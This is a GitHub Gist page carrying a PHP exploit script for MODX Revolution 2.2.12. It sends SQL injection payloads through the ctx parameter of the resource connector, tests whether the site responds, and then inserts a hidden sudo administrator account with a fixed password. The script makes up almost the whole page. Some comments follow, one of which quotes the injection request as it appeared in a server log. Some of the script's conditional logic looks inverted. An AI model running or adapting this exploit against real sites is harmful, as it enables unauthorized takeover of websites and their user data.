Last active
March 18, 2018 12:39
-
-
Save vgrish/f7f3fb94e39f48f08121 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| class SqlInjection{ | |
| const UID = 'GaGaGa'; | |
| static public $CONNECTOR_PATH = '/connectors/'; | |
| static public $TABLE_PREFIX = 'modx_'; | |
| static protected $goodRequest = null; | |
| static protected function sqlBad(){ | |
| $userTable = self::getTableName('users'); | |
| return 'UNION+SELECT+id,username,password+FROM+'.$userTable.'+WHERE+id+IN(99999);'; | |
| } | |
| static protected function sqlGood(){ | |
| $userTable = self::getTableName('users'); | |
| return 'UNION+SELECT+id,username,password+FROM+'.$userTable.'+WHERE+id+IN(1);'; | |
| } | |
| static public function curl($url, $data = '', array $header = array()){ | |
| $ch = curl_init(); | |
| curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
| curl_setopt($ch, CURLOPT_VERBOSE, false); | |
| curl_setopt($ch, CURLOPT_POST, true); | |
| curl_setopt($ch, CURLOPT_POSTFIELDS, $data); | |
| if(!empty($header)){ | |
| curl_setopt($ch, CURLOPT_HTTPHEADER, $header); | |
| } | |
| curl_setopt($ch, CURLOPT_TIMEOUT, 10); | |
| curl_setopt($ch, CURLOPT_URL, $url); | |
| return curl_exec($ch); | |
| } | |
| public static function validate($host){ | |
| self::$goodRequest = null; | |
| $outBad = self::curl(self::makePath($host), self::makeUrl(self::sqlBad())); | |
| $outGood = self::curl(self::makePath($host), self::makeUrl(self::sqlGood())); | |
| $out = ( $outGood != $outBad ); | |
| if($out){ | |
| self::$goodRequest = $outGood; | |
| } | |
| return $out; | |
| } | |
| public static function getTableName($table){ | |
| return self::$TABLE_PREFIX . $table; | |
| } | |
| public static function makeUrl($sql){ | |
| $sql = rtrim($sql, ';'); | |
| return str_replace('=','%3D', 'ctx[rank`+IN+(666)+'.$sql.';/*]'). '=' . self::UID; | |
| } | |
| public static function makePath($host, $connector = 'resource/index.php'){ | |
| return $host . self::$CONNECTOR_PATH . $connector; | |
| } | |
| public static function makeHost($host){ | |
| $data = parse_url($host); | |
| $out = self::getParam('host', $data, self::getParam('path', $data)); | |
| if(!empty($out)){ | |
| $out = 'http://' . $out; | |
| } | |
| return $out; | |
| } | |
| public static function br(){ | |
| self::showLog(); | |
| } | |
| public static function showLog($msg='', $br = false){ | |
| print $msg."\n"; | |
| if($br){ | |
| self::br(); | |
| } | |
| } | |
| public static function createUser($host, $username){ | |
| $userTable = self::getTableName('users'); | |
| $attributesTable = self::getTableName('user_attributes'); | |
| $sql = 'INSERT+INTO+'.$userTable.'(`username`,`password`,`active`,`salt`,`primary_group`,`sudo`)+VALUES(\''.$username.'\',\'K/kCexN2TCvP4/L9w7i%2BIlzKfRVbH9MlhE4hXmD88Mw=\', 1, \'dd257bbc31dbe5c3518c95b592f5bfca\', 1, 1);'; | |
| self::curl(self::makePath($host), self::makeUrl(self::sqlBad().$sql)); | |
| $sql = 'INSERT+INTO+'.$attributesTable.'+(`email`,`blocked`)+VALUES+(\'fuckyoumodxrevolutionagain2@asdasd.ru\', 0)'; | |
| self::curl(self::makePath($host), self::makeUrl(self::sqlBad().$sql)); | |
| $sql = 'UPDATE+'.$attributesTable.'+SET+`internalKey`+=+(SELECT+`id`+FROM+'.$userTable.'+WHERE+`username`=\''.$username.'\'+LIMIT+1)+WHERE+`internalKey`+=+0'; | |
| self::curl(self::makePath($host), self::makeUrl(self::sqlBad().$sql)); | |
| $sql = 'UNION+SELECT+id,username,password+FROM+'.$userTable.'+WHERE+username+IN(\''.$username.'\')'; | |
| $lastRequest = self::curl(self::makePath($host), self::makeUrl(self::sqlGood().$sql)); | |
| return ( !empty(self::$goodRequest) && self::$goodRequest == $lastRequest ); | |
| } | |
| public static function getParam($key, array $data = array(), $default = null){ | |
| return array_key_exists($key, $data) ? $data[$key] : $default; | |
| } | |
| } | |
| if(php_sapi_name() === 'cli'){ | |
| SqlInjection::showLog('Use command line'); | |
| exit; | |
| } | |
| SqlInjection::showLog('/****************************************/'); | |
| SqlInjection::showLog('/* Exploit for MODX Revolution 2.2.12 */'); | |
| SqlInjection::showLog('/* Author: Agel_Nash */'); | |
| SqlInjection::showLog('/* Date: 05.03.2014 */'); | |
| SqlInjection::showLog('/****************************************/', true); | |
| SqlInjection::showLog('Example: php '.basename(__FILE__).' host [connector_path] [table_prefix] [username]', true); | |
| SqlInjection::br(); | |
| if( !isset($argv) || !is_array($argv) || count($argv)<2 ){ | |
| SqlInjection::showLog('Example: php revo2212.php example.com /connector/ modx_ test'); | |
| exit; | |
| } | |
| $host = SqlInjection::makeHost(SqlInjection::getParam(1, $argv, '')); | |
| SqlInjection::$CONNECTOR_PATH = SqlInjection::getParam(2, $argv, SqlInjection::$CONNECTOR_PATH); | |
| SqlInjection::$TABLE_PREFIX = SqlInjection::getParam(3, $argv, SqlInjection::$TABLE_PREFIX); | |
| $userName = SqlInjection::getParam(4, $argv, SqlInjection::UID); | |
| if( empty($host) && SqlInjection::validate($host) ){ | |
| SqlInjection::showLog('Good validate'); | |
| SqlInjection::showLog('Create sudo user "'.$userName.'" with password 123123123...'); | |
| if(SqlInjection::createUser($host, $userName)){ | |
| SqlInjection::showLog('Done'); | |
| }else{ | |
| SqlInjection::showLog('Error'); | |
| } | |
| }else{ | |
| SqlInjection::showLog('Fail'); | |
| } |
Skids gonna skid
I wish someone would actually teach these kids
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Got this fired on my server
/connectors/resource/index.php?ctx[rank%60+IN+(666)+UNION+SELECT+id,username,password+FROM+modx_users+WHERE+id+IN(1);/*]=fuckyoumodxrevolutionagain2
blocked in http-tarpit.org now :-)